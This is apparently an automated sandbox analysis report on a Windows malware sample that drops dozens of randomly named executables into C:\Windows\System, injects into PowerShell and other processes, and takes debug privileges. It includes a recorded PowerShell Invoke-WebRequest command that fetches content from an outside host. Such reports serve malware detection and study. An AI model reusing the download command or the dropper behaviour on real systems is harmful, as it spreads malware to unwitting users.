File created C:\Windows\System\lPBDoLI.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eBhDWvo.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rlqNscG.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cKweVBC.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fLhCcFD.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dZafGDw.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QwRVkOk.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rmrAuZa.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jsPmjZL.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kJrqKrW.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jCTpqpX.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wLLICmc.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bhewFtw.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JcCVPGf.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EmQcdhk.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PUUdEbK.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rnluBTp.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AGQpAyI.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DqVtaZI.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qJinpNc.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TLkDRmb.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jlCySUk.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IxTJVFB.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HzQoOwh.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XiBlyKa.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Dwnkrem.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aklPCYb.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dZoasdk.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bqGykMn.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MIwnLQa.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KdCcYXp.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LjRAqcd.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\awLmWNq.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MqvhMTI.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fOfTTme.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VJxOSHw.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aNYzUBw.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SyXESkk.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hULqGwi.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TEcBKOL.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lYBnffV.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ANfqzEY.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WEiIsgJ.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PioaIWU.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UDzvCJJ.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jAXIHOM.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UDQEqWU.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4588 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4588 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4588 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\PNcDCAh.exe
PID 4588 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\PNcDCAh.exe
PID 4588 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\rHyXYGa.exe
PID 4588 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\rHyXYGa.exe
PID 4588 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\aIawYab.exe
PID 4588 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\aIawYab.exe
PID 4588 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\LtZdfXc.exe
PID 4588 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\LtZdfXc.exe
PID 4588 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\bIutWCa.exe
PID 4588 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\bIutWCa.exe
PID 4588 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\evMSfni.exe
PID 4588 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\evMSfni.exe
PID 4588 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\VAZcxOe.exe
PID 4588 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\VAZcxOe.exe
PID 4588 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\aklPCYb.exe
PID 4588 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\aklPCYb.exe
PID 4588 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\Mptmuaf.exe
PID 4588 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\Mptmuaf.exe
PID 4588 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\WFoYxlD.exe
PID 4588 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\WFoYxlD.exe
PID 4588 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\MguZDUI.exe
PID 4588 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\MguZDUI.exe
PID 4588 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\JmaqElb.exe
PID 4588 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\JmaqElb.exe
PID 4588 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\IcNTnII.exe
PID 4588 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\IcNTnII.exe
PID 4588 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\ClrZQtV.exe
PID 4588 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\ClrZQtV.exe
PID 4588 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\anrXFfS.exe
PID 4588 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\anrXFfS.exe
PID 4588 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\qlMqAzw.exe
PID 4588 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\qlMqAzw.exe
PID 4588 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\LqrMDqM.exe
PID 4588 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\LqrMDqM.exe
PID 4588 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\erHWPee.exe
PID 4588 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\erHWPee.exe
PID 4588 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\DImGUCE.exe
PID 4588 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\DImGUCE.exe
PID 4588 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\DNdauNW.exe
PID 4588 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\DNdauNW.exe
PID 4588 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\NkkoPGl.exe
PID 4588 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\NkkoPGl.exe
PID 4588 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\EQjETqy.exe
PID 4588 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\EQjETqy.exe
PID 4588 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\dTxFCFr.exe
PID 4588 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\dTxFCFr.exe
PID 4588 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\PbkTAmO.exe
PID 4588 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\PbkTAmO.exe
PID 4588 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\bugHoBV.exe
PID 4588 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\bugHoBV.exe
PID 4588 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\fPflDOk.exe
PID 4588 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\fPflDOk.exe
PID 4588 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\PDpaLsk.exe
PID 4588 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\PDpaLsk.exe
PID 4588 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\Ndxypar.exe
PID 4588 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\Ndxypar.exe
PID 4588 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\ZNqgEfG.exe
PID 4588 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\ZNqgEfG.exe
PID 4588 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\CBTzxEr.exe
PID 4588 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\CBTzxEr.exe
PID 4588 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\rNIdeQm.exe
PID 4588 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\rNIdeQm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\PNcDCAh.exe

C:\Windows\System\PNcDCAh.exe

C:\Windows\System\rHyXYGa.exe

C:\Windows\System\rHyXYGa.exe

C:\Windows\System\aIawYab.exe

C:\Windows\System\aIawYab.exe

C:\Windows\System\LtZdfXc.exe

C:\Windows\System\LtZdfXc.exe

C:\Windows\System\bIutWCa.exe

C:\Windows\System\bIutWCa.exe

C:\Windows\System\evMSfni.exe

C:\Windows\System\evMSfni.exe

C:\Windows\System\VAZcxOe.exe

C:\Windows\System\VAZcxOe.exe

C:\Windows\System\aklPCYb.exe

C:\Windows\System\aklPCYb.exe

C:\Windows\System\Mptmuaf.exe

C:\Windows\System\Mptmuaf.exe

C:\Windows\System\WFoYxlD.exe

C:\Windows\System\WFoYxlD.exe

C:\Windows\System\MguZDUI.exe

C:\Windows\System\MguZDUI.exe

C:\Windows\System\JmaqElb.exe

C:\Windows\System\JmaqElb.exe

C:\Windows\System\IcNTnII.exe

C:\Windows\System\IcNTnII.exe

C:\Windows\System\ClrZQtV.exe

C:\Windows\System\ClrZQtV.exe

C:\Windows\System\anrXFfS.exe

C:\Windows\System\anrXFfS.exe

C:\Windows\System\qlMqAzw.exe

C:\Windows\System\qlMqAzw.exe

C:\Windows\System\LqrMDqM.exe

C:\Windows\System\LqrMDqM.exe

C:\Windows\System\erHWPee.exe

C:\Windows\System\erHWPee.exe

C:\Windows\System\DImGUCE.exe

C:\Windows\System\DImGUCE.exe

C:\Windows\System\DNdauNW.exe

C:\Windows\System\DNdauNW.exe

C:\Windows\System\NkkoPGl.exe

C:\Windows\System\NkkoPGl.exe

C:\Windows\System\EQjETqy.exe

C:\Windows\System\EQjETqy.exe

C:\Windows\System\dTxFCFr.exe

C:\Windows\System\dTxFCFr.exe

C:\Windows\System\PbkTAmO.exe

C:\Windows\System\PbkTAmO.exe

C:\Windows\System\bugHoBV.exe

C:\Windows\System\bugHoBV.exe

C:\Windows\System\fPflDOk.exe

C:\Windows\System\fPflDOk.exe

C:\Windows\System\PDpaLsk.exe

C:\Windows\System\PDpaLsk.exe

C:\Windows\System\Ndxypar.exe

C:\Windows\System\Ndxypar.exe

C:\Windows\System\ZNqgEfG.exe

C:\Windows\System\ZNqgEfG.exe

C:\Windows\System\CBTzxEr.exe

C:\Windows\System\CBTzxEr.exe

C:\Windows\System\rNIdeQm.exe

C:\Windows\System\rNIdeQm.exe

C:\Windows\System\krmDWqP.exe

C:\Windows\System\krmDWqP.exe

C:\Windows\System\xLDgFBL.exe

C:\Windows\System\xLDgFBL.exe

C:\Windows\System\UlnEnPJ.exe

C:\Windows\System\UlnEnPJ.exe

C:\Windows\System\FIRRAjH.exe

C:\Windows\System\FIRRAjH.exe

C:\Windows\System\ToSsbMy.exe

C:\Windows\System\ToSsbMy.exe

C:\Windows\System\QRZjqvf.exe

C:\Windows\System\QRZjqvf.exe

C:\Windows\System\jAXIHOM.exe

C:\Windows\System\jAXIHOM.exe

C:\Windows\System\cwKVXJj.exe

C:\Windows\System\cwKVXJj.exe

C:\Windows\System\LXHCQJL.exe

C:\Windows\System\LXHCQJL.exe

C:\Windows\System\wPEdiLF.exe

C:\Windows\System\wPEdiLF.exe

C:\Windows\System\YfEKOhv.exe

C:\Windows\System\YfEKOhv.exe

C:\Windows\System\jQxlnrB.exe

C:\Windows\System\jQxlnrB.exe

C:\Windows\System\eNQMdBI.exe

C:\Windows\System\eNQMdBI.exe

C:\Windows\System\wdLBrQh.exe

C:\Windows\System\wdLBrQh.exe

C:\Windows\System\VsRuFOV.exe

C:\Windows\System\VsRuFOV.exe

C:\Windows\System\qJinpNc.exe

C:\Windows\System\qJinpNc.exe

C:\Windows\System\oZwqcgz.exe

C:\Windows\System\oZwqcgz.exe

C:\Windows\System\gpaCyUh.exe

C:\Windows\System\gpaCyUh.exe

C:\Windows\System\ImHeApT.exe

C:\Windows\System\ImHeApT.exe

C:\Windows\System\bmdfCev.exe

C:\Windows\System\bmdfCev.exe

C:\Windows\System\rLYvdVH.exe

C:\Windows\System\rLYvdVH.exe

C:\Windows\System\LnBfYKk.exe

C:\Windows\System\LnBfYKk.exe

C:\Windows\System\lDOrwTu.exe

C:\Windows\System\lDOrwTu.exe

C:\Windows\System\UHOZlgg.exe

C:\Windows\System\UHOZlgg.exe

C:\Windows\System\xYBFclo.exe

C:\Windows\System\xYBFclo.exe

C:\Windows\System\VuZGgIw.exe

C:\Windows\System\VuZGgIw.exe

C:\Windows\System\xrQLkgA.exe

C:\Windows\System\xrQLkgA.exe

C:\Windows\System\YZVivKy.exe

C:\Windows\System\YZVivKy.exe

C:\Windows\System\kqepxZy.exe

C:\Windows\System\kqepxZy.exe

C:\Windows\System\KIyGpMy.exe

C:\Windows\System\KIyGpMy.exe

C:\Windows\System\RXlvbdT.exe

C:\Windows\System\RXlvbdT.exe

C:\Windows\System\XVaSoXf.exe

C:\Windows\System\XVaSoXf.exe

C:\Windows\System\WGHDbhs.exe

C:\Windows\System\WGHDbhs.exe

C:\Windows\System\OYvkzSo.exe

C:\Windows\System\OYvkzSo.exe

C:\Windows\System\PPLUSpd.exe

C:\Windows\System\PPLUSpd.exe

C:\Windows\System\eQzlwpn.exe

C:\Windows\System\eQzlwpn.exe

C:\Windows\System\rvdXfNu.exe

C:\Windows\System\rvdXfNu.exe

C:\Windows\System\HwuATMp.exe

C:\Windows\System\HwuATMp.exe

C:\Windows\System\cFuyHBj.exe

C:\Windows\System\cFuyHBj.exe

C:\Windows\System\zjDIKnq.exe

C:\Windows\System\zjDIKnq.exe

C:\Windows\System\pBqmlRG.exe

C:\Windows\System\pBqmlRG.exe

C:\Windows\System\pKQjyNu.exe

C:\Windows\System\pKQjyNu.exe

C:\Windows\System\SuAJQKp.exe

C:\Windows\System\SuAJQKp.exe

C:\Windows\System\nvyjnOT.exe

C:\Windows\System\nvyjnOT.exe

C:\Windows\System\HTesvmI.exe

C:\Windows\System\HTesvmI.exe

C:\Windows\System\TyDjbEA.exe

C:\Windows\System\TyDjbEA.exe

C:\Windows\System\BTsfmkE.exe

C:\Windows\System\BTsfmkE.exe

C:\Windows\System\oNvkvUY.exe

C:\Windows\System\oNvkvUY.exe

C:\Windows\System\emeiZKH.exe

C:\Windows\System\emeiZKH.exe

C:\Windows\System\jCTpqpX.exe

C:\Windows\System\jCTpqpX.exe

C:\Windows\System\qoDjfHb.exe

C:\Windows\System\qoDjfHb.exe

C:\Windows\System\YHFJEtk.exe

C:\Windows\System\YHFJEtk.exe

C:\Windows\System\GbBlAri.exe

C:\Windows\System\GbBlAri.exe

C:\Windows\System\wwimsZd.exe

C:\Windows\System\wwimsZd.exe

C:\Windows\System\MrHYKmP.exe

C:\Windows\System\MrHYKmP.exe

C:\Windows\System\JstWLRQ.exe

C:\Windows\System\JstWLRQ.exe

C:\Windows\System\RRhbIdQ.exe

C:\Windows\System\RRhbIdQ.exe

C:\Windows\System\ONakZDt.exe

C:\Windows\System\ONakZDt.exe

C:\Windows\System\gKgglKp.exe

C:\Windows\System\gKgglKp.exe

C:\Windows\System\uYqiqRm.exe

C:\Windows\System\uYqiqRm.exe

C:\Windows\System\FInVdBJ.exe

C:\Windows\System\FInVdBJ.exe

C:\Windows\System\bpMtqRZ.exe

C:\Windows\System\bpMtqRZ.exe

C:\Windows\System\QRTqvpA.exe

C:\Windows\System\QRTqvpA.exe

C:\Windows\System\fpOiIzv.exe

C:\Windows\System\fpOiIzv.exe

C:\Windows\System\KhPOwNM.exe

C:\Windows\System\KhPOwNM.exe

C:\Windows\System\zKPMOAI.exe

C:\Windows\System\zKPMOAI.exe

C:\Windows\System\xNxXrUW.exe

C:\Windows\System\xNxXrUW.exe

C:\Windows\System\NFrUaTV.exe

C:\Windows\System\NFrUaTV.exe

C:\Windows\System\HeHkQvx.exe

C:\Windows\System\HeHkQvx.exe

C:\Windows\System\kQhbHBD.exe

C:\Windows\System\kQhbHBD.exe

C:\Windows\System\KKtmINe.exe

C:\Windows\System\KKtmINe.exe

C:\Windows\System\RxLKOdL.exe

C:\Windows\System\RxLKOdL.exe

C:\Windows\System\TpSMNgs.exe

C:\Windows\System\TpSMNgs.exe

C:\Windows\System\LVChRpQ.exe

C:\Windows\System\LVChRpQ.exe

C:\Windows\System\LvQNZJV.exe

C:\Windows\System\LvQNZJV.exe

C:\Windows\System\cFwpjtQ.exe

C:\Windows\System\cFwpjtQ.exe

C:\Windows\System\CQvmfxZ.exe

C:\Windows\System\CQvmfxZ.exe

C:\Windows\System\UICNouI.exe

C:\Windows\System\UICNouI.exe

C:\Windows\System\voEQiXc.exe

C:\Windows\System\voEQiXc.exe

C:\Windows\System\RITqIuY.exe

C:\Windows\System\RITqIuY.exe

C:\Windows\System\vmBjpOr.exe

C:\Windows\System\vmBjpOr.exe

C:\Windows\System\bFjuvsO.exe

C:\Windows\System\bFjuvsO.exe

C:\Windows\System\JYUOSbv.exe

C:\Windows\System\JYUOSbv.exe

